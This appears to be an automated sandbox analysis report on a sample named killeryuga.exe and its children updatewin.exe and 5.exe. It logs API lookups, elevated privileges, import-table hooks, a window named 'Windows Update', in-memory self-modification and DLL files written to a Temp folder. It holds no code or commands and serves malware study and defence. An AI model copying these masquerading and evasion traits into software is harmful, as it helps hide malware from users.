Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
System (256)
Operation Additional Information Success Count
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Get Time type = Ticks, time = 119777 True 1
Get Time type = Performance Ctr, time = 18199941480 True 1
Get Time type = Ticks, time = 119839 True 1
Get Time type = System Time True 249
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Get Time type = Performance Ctr, time = 18298853611 True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count
Get Environment String - True 2
Process #11: updatewin.exe
714 0
Information Value
ID #11
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:01, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:15
OS Process Information
Information Value
PID 0xa18
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0xA1C
0xA70
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA
buffer 0x004F5000 0x004F5FFF Marked Executable - 32-bit - False
updatewin.exe 0x00400000 0x0044DFFF Forced - 32-bit - False
Hook Information
Type Installer Target Size Information
IAT private_0x00000000004e0000:+0x16785 90. entry of updatewin.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to pagefile_0x0000000000900000:+0x700000
IAT private_0x00000000004e0000:+0x16785 121. entry of updatewin.exe 4 bytes user32.dll:CallMsgFilterW+0x0 now points to pagefile_0x0000000000900000:+0x700000
Host Behavior
File (6)
Operation Filename Additional Information Success Count
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Module (169)
Operation Module Additional Information Success Count
Load kernel32.dll base_address = 0x76c20000 True 2
Load KERNEL32.dll base_address = 0x76c20000 True 1
Load USER32.dll base_address = 0x74f40000 True 1
Load GDI32.dll base_address = 0x75ad0000 True 1
Load COMCTL32.dll base_address = 0x74820000 True 1
Load WINMM.dll base_address = 0x74af0000 True 1
Load msvcr100.dll base_address = 0x749c0000 True 1
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Load kernel32 base_address = 0x0 False 2
Load kernel32 base_address = 0x76c20000 True 2
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\updatewin.exe, size = 260 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x76c310ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x76c31700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x76c334d5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Get Address c:\windows\syswow64\user32.dll function = GetDesktopWindow, address_out = 0x74f60a19 True 1
Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x748409ce True 1
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Window (1)
Operation Window Name Additional Information Success Count Logfile
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
System (266)
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 10
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Get Time type = Ticks, time = 120198 True 1
Get Time type = Performance Ctr, time = 18241963676 True 1
Get Time type = Ticks, time = 120229 True 1
Get Time type = System Time True 249
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Get Time type = Performance Ctr, time = 18359128587 True 1
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Data
Process #12: 5.exe
1347 2
Information Value
ID #12
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
Information Value
PID 0xa38
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xA3C, 0xA78, 0xA7C, 0xA80, 0xA84, 0xA88, 0xA8C, 0xA90, 0xACC
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
5.exe 0x00400000 0x0047FFFF Marked Writable - 32-bit - False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00405B40, 0x0040273D False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040372A, 0x00404440 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00409000, 0x00408FEA, ... False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040D36D, 0x0040B64F False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00401A8A, 0x0040AF97, ... False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00422DC0, 0x00424B80 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00423300 False
buffer 0x00549D18 0x00559C80 Marked Executable - 32-bit - False
buffer 0x00549D18 0x00559C80 Content Changed - 32-bit 0x0054A643, 0x00549D18 False
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0041A684 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040C3C4 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00414020 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00412564 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004108F8 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00415290 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004176D0 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00418CEC True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00419108 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040F944 True
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004132E0 True
Dropped Files
Filename File Size Hash Values YARA Match Actions
Host Behavior
COM (1)
Operation Class Interface Additional Information Success Count Logfile
Create 3C374A40-BAE4-11CF-BF7D-00AA006946EE 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
File (577)
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
